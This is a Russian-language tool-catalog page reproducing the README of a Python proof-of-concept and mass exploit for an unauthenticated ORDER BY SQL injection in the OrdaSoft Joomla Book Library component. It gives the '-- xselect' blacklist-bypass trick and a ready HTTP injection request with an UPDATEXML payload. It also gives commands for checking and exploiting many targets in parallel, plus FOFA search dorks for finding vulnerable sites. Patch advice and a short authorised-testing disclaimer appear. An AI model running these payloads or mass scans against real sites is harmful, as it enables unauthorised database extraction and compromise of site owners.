Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/murrez/cve-2026-101110
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubmurrez/cve-2026-101110

CVE-2026-101110

Python 3 PoC и массовый эксплойт для CVE-2026-101110 — неаутентифицированная SQL-инъекция через ORDER BY в OrdaSoft Joomla Book Library <=6.4.6 с использованием параметров field/direction.

4 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
Поделиться

CVE-2026-101110 — OrdaSoft Book Library (Free) неаутентифицированная SQL-инъекция

Python 3 PoC для CVE-2026-101110 — OrdaSoft Book Library (Free) для Joomla ≤ 6.4.6. Обновитесь до 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Каталогhttps://pocbit.org/pocs/
Компонентcom_booklibrary
Файл / функцияsite/booklibrary.php → books()
Параметрыfield, direction (сортировка)
АутентификацияОтсутствует (публичные списки книг)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critical (Joomla CNA)
БлагодарностьAla Arfaoui

Краткое описание уязвимости (Türkçe)

Book Library (Free) — это расширение OrdaSoft, предоставляющее списки книжных библиотек / категорий в Joomla. В версиях 6.4.6 и более ранних функция books() фильтрует параметры field и direction с помощью protectInjectionWithoutQuote(). Эта функция реализует лишь слабый чёрный список, ищущий подстроку select; при обнаружении она оборачивает значение в $db->quote(), а не отклоняет его.

Значения затем добавляются в незакавыченное выражение ORDER BY — использование кавычек здесь не предотвращает SQL-инъекцию (описание CNA).

Для эксплуатации требуются два условия:

  1. Инициализация сессии: Первый запрос записывает в сессию значения сортировки по умолчанию (field / direction).
  2. Обход чёрного списка: Во втором запросе в конец полезной нагрузки добавляется приманка-комментарий -- xselect; она проходит проверку чёрного списка, а SQL-комментарий нейтрализует остаток полезной нагрузки.

Результат: ORDER BY SQLi без аутентификации, критический риск для чтения/записи базы данных и целостности сайта.


Технический механизм

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Слабый фильтр (концептуально):

  • Входные данные содержат select (подстрока) → всё значение оборачивается в кавычки (не имеет значения в контексте ORDER BY).
  • Атакующий добавляет -- xselect, чтобы чёрный список увидел select внутри хвоста комментария, тогда как активное выражение перед -- остаётся исполняемым SQL (error-based / UPDATEXML / stacked ORDER BY приёмы).

PoC реализует:

ШагДействие
FingerprintПути com_booklibrary + опциональная версия из манифеста
Route discoveryshowCategory, search, showBooks, books, … + спарсенные catid / Itemid
checkИнициализация сессии → подтверждение SQLi (флаг / VERSION())
exploitИнициализация → извлечение через --subquery (по умолчанию SELECT VERSION())
mass--list + -j параллельных целей; exploited.txt при успешной утечке

Константа суффикса полезной нагрузки в коде: -- xselect (BLACKLIST_DECOY).


Требования

cd CVE-2026-101110
pip install -r requirements.txt

Использование

Одиночная цель

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Массовый перебор (сначала эксплуатация)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
ФлагЗначение
--aggressiveВ режиме check пытается извлечь версию после инициализации
--subqueryВнутреннее выражение для UPDATEXML / double-query полезных нагрузок
--exploited-listУспешные извлечения, разделённые табуляцией
--no-colorОтключить ANSI (также NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Пример HTTP

Инициализация (сессия):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Инъекция (PoC добавляет приманку):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

POST-варианты пробуются на том же маршруте, если GET не срабатывает.


Определение версии

Манифест (если доступен):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → уязвимая строка; ≥ 6.4.7 → исправлено (patched_version в выводе check).


FOFA dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

Связанные CVE OrdaSoft (сентябрь 2026)

CVEРасширениеПроблемаИсправлено
CVE-2026-101110Book LibraryORDER BY SQLi + обход чёрного списка6.4.7
CVE-2026-101111Book LibraryОтражённый XSS (параметр title)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

Патчите все развёрнутые компоненты OrdaSoft.


Ссылки

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Историческая справка: более ранняя SQLi в com_booklibrary в задачах search/lend (CVE-2010-1522) — другие пути кода

Правовая информация

Только авторизованное тестирование и проверка патчей.


Описание репозитория GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Скачать инструмент